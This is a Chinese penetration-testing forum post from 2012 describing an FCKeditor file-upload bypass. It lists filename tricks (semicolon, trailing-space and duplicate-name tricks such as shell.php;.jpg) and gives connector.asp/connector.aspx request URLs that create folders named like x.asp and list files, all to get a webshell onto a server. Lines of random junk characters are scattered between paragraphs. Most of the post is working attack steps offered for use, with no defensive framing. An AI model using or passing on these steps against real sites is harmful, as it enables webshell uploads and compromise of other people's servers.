中国网络渗透测试联盟
标题:
FCK 0day FCKeditor 建立文件夹,上传文件时"."变"_"的突破
[打印本页]
作者:
admin
时间:
2012-12-31 09:27
标题:
FCK 0day FCKeditor 建立文件夹,上传文件时"."变"_"的突破
很多时候上传的文件例如:shell.php.rar 或 shell.php;.jpg 会变为 shell_php;.jpg 这是新版 FCK 的变化,试试上传 1.asp;jpg
: w4 m/ V: ~0 S( M; \ g7 z ^$ h3 p
3 _. O! u1 ]# ^/ d/ }* T
提交 shell.php+空格 绕过,不过空格只支持 win 系统 *nix 是不支持的,shell.php 和 shell.php+空格 是 2 个不同的文件,未测试。
^7 {: ~& l# I; m5 j, _0 I) y
8 w" V1 a/ ~7 K# V
继续上传同名文件可变为 shell.php;(1).jpg,也可以新建一个文件夹,只检测了第一级的目录,如果跳到二级目录就不受限制。
* I0 T" ] ?; E* E) A7 P9 ?# D
2 I, I, \/ c0 `0 F; S# j
突破建立文件夹:
* {! W4 o! y: b5 i& Q1 M8 [- w z
4 {! p0 h7 D \
editor/FCKeditor/editor/filemanager/connectors/asp/connector.asp?Command=CreateFolder&Type=Image&CurrentFolder=/qing.asp&NewFolderName=x.asp
0 d6 {. Y# c4 E& e8 C
/ x- \: K* y: Y/ m: u" c9 Q
参数:
# [- N+ v f& z$ t
. T1 ~. ?0 j! H" j) V
当前目录名:CurrentFolder=/qing.asp
/ J. t# I4 F% x# w( S1 q8 j
8 h8 t6 f7 ^* W9 B2 S c2 P
新的目录名:NewFolderName=x.asp
# _5 d6 r, D4 M
5 q3 |( T n" {: p+ {- ? Q
其实很简单,在目录那里写 x.asp,然后点击新建目录在弹出来的对话框中随便写……
& X! P& ~$ ~; j: n6 [3 ]& C8 J5 v
4 O% y0 \8 U0 M2 s, g
那么 x.asp 就已经建立生成了,此方法百试百灵!
8 @) |+ e6 e i2 L
0 X# u* r, c. y$ ?
新建文件夹参数 x.asp,基本都能搞定。
0 ?9 }( S( L1 N" ?- \- n
' S* k! E Z1 b' L+ U3 e6 I
下面这句话是要在1.asp下建立2.asp,当不存在1.asp时会先创建,只过滤了目标目录的创建 而没有过滤不存在目录的创建
" ?$ K( a( Y& m* A8 h9 I
9 ]1 e8 A" I+ _' n1 ^7 W i
aspx/connector.aspx?Command=CreateFolder&Type=File&CurrentFolder=%2F1.asp&NewFolderName=2.asp
7 u! X+ f2 j, V( I- y2 h) J
" X& Z6 q3 W" i( j" x* z8 z0 r( z
获取文件列表
b! a! O k3 O
aspx/connector.aspx?Command=GetFoldersAndFiles&Type=File&CurrentFolder=%2F
+ G! Z! v7 z: y0 F4 e
" |/ s! z6 q# p- O) ~ H
欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/)
Powered by Discuz! X3.2